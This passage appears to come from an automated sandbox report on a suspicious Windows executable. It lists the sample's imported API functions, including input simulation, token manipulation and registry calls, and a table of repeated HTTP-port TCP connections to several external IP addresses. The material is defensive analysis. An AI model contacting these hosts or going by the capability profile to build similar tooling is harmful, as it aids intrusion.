                                                                USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishGreat Britain

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 10, 2024 12:17:41.555922985 CET4973680192.168.2.443.205.198.29
                                                                Dec 10, 2024 12:17:41.675285101 CET804973643.205.198.29192.168.2.4
                                                                Dec 10, 2024 12:17:41.675610065 CET4973680192.168.2.443.205.198.29
                                                                Dec 10, 2024 12:17:41.686014891 CET4973680192.168.2.443.205.198.29
                                                                Dec 10, 2024 12:17:41.805478096 CET804973643.205.198.29192.168.2.4
                                                                Dec 10, 2024 12:17:43.154474020 CET804973643.205.198.29192.168.2.4
                                                                Dec 10, 2024 12:17:43.154516935 CET804973643.205.198.29192.168.2.4
                                                                Dec 10, 2024 12:17:43.154670000 CET4973680192.168.2.443.205.198.29
                                                                Dec 10, 2024 12:17:43.158274889 CET4973680192.168.2.443.205.198.29
                                                                Dec 10, 2024 12:17:43.277494907 CET804973643.205.198.29192.168.2.4
                                                                Dec 10, 2024 12:17:58.716763020 CET4975480192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:17:58.836138964 CET804975445.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:17:58.836235046 CET4975480192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:17:58.851478100 CET4975480192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:17:58.970931053 CET804975445.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:00.164731979 CET804975445.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:00.164901972 CET804975445.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:00.164952040 CET4975480192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:00.357495070 CET4975480192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:01.379251003 CET4976080192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:01.498693943 CET804976045.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:01.498788118 CET4976080192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:01.514180899 CET4976080192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:01.634601116 CET804976045.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:02.811902046 CET804976045.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:02.811990023 CET804976045.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:02.812040091 CET4976080192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:03.029294968 CET4976080192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:04.048449993 CET4976680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:04.167689085 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.167876959 CET4976680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:04.183579922 CET4976680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:04.302992105 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303062916 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303148031 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303236008 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303246975 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303339958 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303349972 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303358078 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:04.303479910 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:05.497869015 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:05.544857025 CET4976680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:05.621296883 CET804976645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:05.621364117 CET4976680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:05.685556889 CET4976680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:06.708235025 CET4977680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:06.827543974 CET804977645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:06.827615023 CET4977680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:06.857856989 CET4977680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:06.977222919 CET804977645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:08.139552116 CET804977645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:08.139650106 CET804977645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:08.139755011 CET4977680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:08.142489910 CET4977680192.168.2.445.141.156.114
                                                                Dec 10, 2024 12:18:08.263355017 CET804977645.141.156.114192.168.2.4
                                                                Dec 10, 2024 12:18:13.705754995 CET4979280192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:13.826795101 CET8049792154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:13.826863050 CET4979280192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:13.889539003 CET4979280192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:14.008800983 CET8049792154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:15.362895012 CET8049792154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:15.363049030 CET8049792154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:15.363135099 CET4979280192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:15.404401064 CET4979280192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:16.422909021 CET4979980192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:16.542268038 CET8049799154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:16.543704987 CET4979980192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:16.558583021 CET4979980192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:16.677906036 CET8049799154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:18.060626030 CET4979980192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:18.180486917 CET8049799154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:18.180702925 CET4979980192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:19.098372936 CET4980580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:19.217777967 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.217853069 CET4980580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:19.233438015 CET4980580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:19.353403091 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353414059 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353512049 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353607893 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353617907 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353693962 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353703022 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353712082 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:19.353744030 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:20.748117924 CET4980580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:20.867842913 CET8049805154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:20.867911100 CET4980580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:21.776170969 CET4981580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:21.895612955 CET8049815154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:21.895682096 CET4981580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:21.980484009 CET4981580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:22.100776911 CET8049815154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:23.437036991 CET8049815154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:23.437141895 CET8049815154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:23.437190056 CET4981580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:23.440155983 CET4981580192.168.2.4154.23.184.194
                                                                Dec 10, 2024 12:18:23.559331894 CET8049815154.23.184.194192.168.2.4
                                                                Dec 10, 2024 12:18:29.036308050 CET4983280192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:29.155610085 CET8049832209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:29.155689001 CET4983280192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:29.168332100 CET4983280192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:29.288575888 CET8049832209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:30.467597008 CET8049832209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:30.467730045 CET8049832209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:30.467894077 CET4983280192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:30.670012951 CET4983280192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:31.688977003 CET4983880192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:31.808274031 CET8049838209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:31.808363914 CET4983880192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:31.827893019 CET4983880192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:31.947410107 CET8049838209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:33.030374050 CET8049838209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:33.030685902 CET8049838209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:33.030740023 CET4983880192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:33.341991901 CET4983880192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:34.360738039 CET4984580192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:34.480043888 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.480151892 CET4984580192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:34.495098114 CET4984580192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:34.614428997 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614447117 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614537954 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614547014 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614607096 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614622116 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614634037 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614682913 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:34.614748955 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:35.703543901 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:35.703672886 CET8049845209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:35.703735113 CET4984580192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:35.998157024 CET4984580192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:37.017695904 CET4985480192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:37.137002945 CET8049854209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:37.137300968 CET4985480192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:37.149693012 CET4985480192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:37.269140959 CET8049854209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:38.368654966 CET8049854209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:38.368662119 CET8049854209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:38.372680902 CET4985480192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:38.372680902 CET4985480192.168.2.4209.74.77.108
                                                                Dec 10, 2024 12:18:38.492245913 CET8049854209.74.77.108192.168.2.4
                                                                Dec 10, 2024 12:18:45.108244896 CET4987180192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:45.227552891 CET804987135.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:45.227623940 CET4987180192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:45.248603106 CET4987180192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:45.368608952 CET804987135.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:46.726954937 CET804987135.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:46.727236986 CET804987135.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:46.729804039 CET4987180192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:46.763891935 CET4987180192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:47.784316063 CET4988080192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:47.903687000 CET804988035.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:47.903826952 CET4988080192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:47.918504953 CET4988080192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:48.037805080 CET804988035.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:49.396903038 CET804988035.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:49.396907091 CET804988035.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:49.396954060 CET4988080192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:49.420094967 CET4988080192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:50.443772078 CET4988780192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:50.563235998 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.563412905 CET4988780192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:50.579222918 CET4988780192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:50.698698044 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.698748112 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.698905945 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.698911905 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.699094057 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.699157000 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.699214935 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.699255943 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:50.699300051 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:52.058157921 CET804988735.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:52.092000961 CET4988780192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:53.111712933 CET4989480192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:53.231235027 CET804989435.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:53.231362104 CET4989480192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:53.240180016 CET4989480192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:53.359484911 CET804989435.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:54.724796057 CET804989435.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:54.724894047 CET804989435.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:18:54.725017071 CET4989480192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:54.744198084 CET4989480192.168.2.435.220.176.144
                                                                Dec 10, 2024 12:18:54.863589048 CET804989435.220.176.144192.168.2.4
                                                                Dec 10, 2024 12:19:00.135786057 CET4991080192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:00.255949020 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:00.256026983 CET4991080192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:00.309736013 CET4991080192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:00.429151058 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520039082 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520138025 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520144939 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520265102 CET4991080192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:01.520421982 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520428896 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520441055 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520447016 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520479918 CET4991080192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:01.520492077 CET8049910172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:01.520601988 CET4991080192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:01.827838898 CET4991080192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:02.845220089 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:02.964528084 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:02.964678049 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:02.989814043 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:03.109273911 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.245686054 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.245747089 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.245758057 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.245805025 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:04.246119022 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.246129990 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.246141911 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.246151924 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.246162891 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.246165037 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:04.246172905 CET8049916172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:04.246180058 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:04.246192932 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:04.246208906 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:04.498277903 CET4991680192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:05.517188072 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:05.636642933 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.636806011 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:05.654359102 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:05.773840904 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.773853064 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.773874044 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.773880005 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.773912907 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.773930073 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.774072886 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.774111986 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:05.774118900 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919193029 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919251919 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919265032 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919301033 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:06.919378042 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919384956 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919420958 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:06.919511080 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919517040 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919528008 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919553995 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:06.919580936 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:06.919637918 CET8049923172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:06.919684887 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:07.170188904 CET4992380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:08.194298983 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:08.313606024 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:08.313673973 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:08.322316885 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:08.441589117 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612426996 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612435102 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612447977 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612564087 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:09.612571001 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612579107 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612637043 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:09.612715960 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612721920 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612734079 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612782001 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:09.612847090 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:09.612911940 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.612926006 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:09.613018036 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:09.619843006 CET4993380192.168.2.4172.67.182.171
                                                                Dec 10, 2024 12:19:09.739046097 CET8049933172.67.182.171192.168.2.4
                                                                Dec 10, 2024 12:19:24.038661957 CET4996980192.168.2.415.197.204.56
                                                                Dec 10, 2024 12:19:24.158603907 CET804996915.197.204.56192.168.2.4
                                                                Dec 10, 2024 12:19:24.160075903 CET4996980192.168.2.415.197.204.56
